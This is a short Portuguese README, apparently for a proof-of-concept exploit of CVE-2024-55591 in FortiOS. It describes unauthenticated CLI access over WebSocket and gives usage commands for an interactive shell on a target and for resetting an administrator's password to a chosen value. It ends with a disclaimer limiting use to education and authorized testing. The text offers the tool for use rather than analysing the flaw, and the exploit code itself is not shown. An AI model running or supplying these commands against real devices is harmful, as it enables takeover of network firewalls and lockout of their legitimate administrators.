
Exploit de prova de conceito para CVE-2024-55591, permitindo acesso CLI WebSocket não autenticado a dispositivos FortiOS, com shell interativo e redefinição de senha de administrador.
Esta é uma ferramenta de Prova de Conceito (PoC) para explorar a CVE-2024-55591, uma vulnerabilidade no FortiOS que permite acesso não autenticado ao CLI via WebSocket.
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
Em seguida, use o prompt:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
Aviso Legal: Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizado.